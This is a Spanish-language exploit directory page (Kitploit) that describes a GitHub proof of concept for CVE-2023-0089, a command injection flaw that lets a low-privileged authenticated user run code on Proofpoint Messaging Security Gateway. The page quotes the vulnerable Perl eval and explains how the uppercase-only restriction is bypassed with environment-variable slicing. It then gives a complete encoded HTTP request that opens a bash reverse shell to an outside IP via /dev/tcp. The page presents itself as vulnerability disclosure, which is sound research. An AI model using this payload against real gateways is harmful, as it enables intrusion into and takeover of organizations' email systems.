Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
proofpoint-CVE-2023-0089 — Proofpoint Email Gateway: Usuario autenticado de bajo nivel a administrador RCE | Kitploit
Herramientas/GitHubGitHub/ly1g3/proofpoint-cve-2023-0089
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHubly1g3/proofpoint-cve-2023-0089

proofpoint-CVE-2023-0089

Proofpoint Email Gateway: Usuario autenticado de bajo nivel a administrador RCE

Ver Repositorio
1hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Acerca de

Investigador de seguridad: ly1g3, ly1g3[at]tuta.io

Huella GPG: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Resumen: Ejecución Remota de Código - Usuario autenticado de bajo nivel a RCE de administrador

CVE: CVE-2023-0089

Cronología:

  • Descubierto - ly1g3
  • Reportado - ly1g3
  • Corregido - Proofpoint

Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73

Exploits para Proofpoint Messaging Security Gateway

Ejecución Remota de Código (RCE)

Un usuario de bajo nivel (autenticado) de Euweb puede obtener ejecución arbitraria de código con privilegios de administrador.

Técnico

La función getMsgType en Euwebutils.pm es vulnerable a inyección de comandos. La variable $module proviene de un parámetro get y no se aplica sanitización a esta entrada del usuario.

root@kitploit:~
sub getMsgType {
...
else {
		$msgtype = eval "Proofpoint::Digest::PROOFPOINT_MAIL_REPORT_MSGTYPE_".uc($module);
	}

Esta función getMsgType es utilizada por muchas llamadas API utilizadas por la aplicación Euweb, por lo que el exploit puede activarse de muchas maneras.

Dado que todos los caracteres deben estar en mayúsculas, se pueden usar variables de entorno para eludir esta restricción para letras minúsculas. Ejemplo: ${SHELL:1:1} en lugar de b

Dado que se utiliza use strict, se puede agregar MAIL_GENERAL() al inicio de la cadena para completar PROOFPOINT_MAIL_REPORT_MSGTYPE_. Después de esto, se puede agregar código perl personalizado.

Ejemplo de payload sin codificar: MAIL_GENERAL();`id`

POC

Shell inversa codificada usando variables de entorno para eludir las restricciones de minúsculas. Código ejecutado como usuario pps.

root@kitploit:~
GET /euweb/euweb?cmd=x_releasemsg&id=0&func=ReleaseMsg&entries=23%3A23%3A12&eid=3&module=MAIL_GENERAL()%3b`/\${SHELL%3a1%3a1}\${SHELL%3a2%3a1}\${LANG%3a1%3a1}/\${USER%3a2%3a1}\${SHELL%3a8%3a1}+-\${SHELL%3a2%3a1}+>%26+/\${SSH_TTY%3a1%3a1}\${TERM%3a2%3a1}\${MAIL%3a1%3a1}/\${TERM%3a1%3a1}\${TERM%3a9%3a1}\${USER%3a0%3a1}/192.168.80.81/443+0>%261`
Descargar herramienta